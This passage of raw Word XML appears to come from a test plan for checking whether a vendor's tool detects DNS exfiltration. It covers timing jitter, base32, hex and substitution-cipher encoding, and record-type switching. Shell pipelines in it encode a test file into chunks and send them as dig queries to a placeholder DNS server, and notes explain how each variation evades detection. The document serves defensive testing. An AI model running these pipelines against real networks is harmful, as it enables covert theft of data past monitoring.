            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="40C245CB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5F320DDF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1E4B106F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0BC0E730" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="77FC63EB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="28923325" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Base64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="089CCB39" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0271E0A0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Record Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="65C318D7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="3FFA8D36" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="022D0F65" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="15B44653" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Random 2–8 second delay</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="67655C37" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0A081DCC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="746BD207" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Defeats fixed-interval detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="6B1D0421" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="368F859E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Chunk Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B05DDDC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>50 characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53346391" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BDC9C00" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How DNS Works in This Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79597C2C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The queries are identical to previous scenarios, but the interval between them is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>randomised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Fixed-window detection rules (e.g., count queries in each 60-second bucket) may miss queries that fall across bucket boundaries. This forces the vendor to impleme</w:t>
      </w:r>
      <w:r>
        <w:t>nt rolling/sliding window analysis rather than fixed time buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD8B75" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31DC01DD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60404696"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base64 | tr -d '\n' | fold -w 50 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE0D763"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78B3C435"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+short "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237B1DE4"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2-8 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE5E375" w14:textId="0A53BCB9" w:rsidR="00407471" w:rsidRPr="00407471" w:rsidRDefault="002170E7" w:rsidP="00407471">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB628BC" w14:textId="77777777" w:rsidR="00407471" w:rsidRDefault="00407471">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EE7815" w14:textId="497BC80B" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>.2 Sc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>enario 4: Encoding Variation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C81A448" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This tests whether detection is tied to specific encoding signatures (e.g., base64 regex) or uses encoding-agnostic entropy analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2488324D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FE8D24" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4a: Base32 Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B795767" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Base32 uses only lowercase a-z and 2-7. The character set is different from base64, but entropy remains high.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191ABC2C"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base32 | tr -d '=\n' | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B1AED7"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tr '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[:upper</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:]' '[:lower:]' | fold -w 50 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D3331"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2BF1A469"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+short "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D202A"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3-10 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7407EB28"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6ED56021" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD5C2E9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4b: Hexadecimal Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A30DEE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Hex uses only 0-9 and a-f. Lower entropy per character than base64 or base32, but still non-dictionary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5A4086"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cat exfil_test.txt | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p | tr -d '\n' | fol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>d -w 50 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706A1F15"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323750A1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    dig +short "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D0ED4"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3-10 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE826D"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556E7E44" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AEEDB69" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4c: Custom Substitution Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0864036B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This replaces the base64 character set with a different mapping. It breaks signature-based detection while ma</w:t>
      </w:r>
      <w:r>
        <w:t>intaining the same data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE3E327"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base64 | tr -d '\n' | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648E53B7"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tr 'A-Za-z0-9+/' 'a-zA-Z9-0he' | fold -w 40 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432E79C2"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6901DEFE"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+short "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D4961C"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3-10 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018F6FDD"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76C333E5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7C7799" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>.3 Scenario 5: Record Type Switching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75050843"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B2212" w14:paraId="196F1787" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="5D1AF0D1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="6D957324" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="5A43649F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="55E65BCD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="015CA570" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="42214285" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="667804AC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="255828C8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Base64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="1ACFF733" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1101B532" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Record Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="09910095" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>TXT, MX, CNAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="18A6DD39" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="374B134E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="56305E84" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Exploits tools that only monitor A/AAAA queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5481A36E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C6796FE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How DNS Works in This Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D18548E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS supports many record types. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>A records</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> resolve to IPv4 addresses, TXT records return text strings, MX records return mail server names, and CNAME records return aliases. The exfiltrated data is in the subdomain label of the query, not in the response — </w:t>
      </w:r>
      <w:r>
        <w:t>so the record type is irrelevant to the exfiltration itself. But many detection tools only inspect A and AAAA queries, leaving other types unmonitored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2970B3F6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
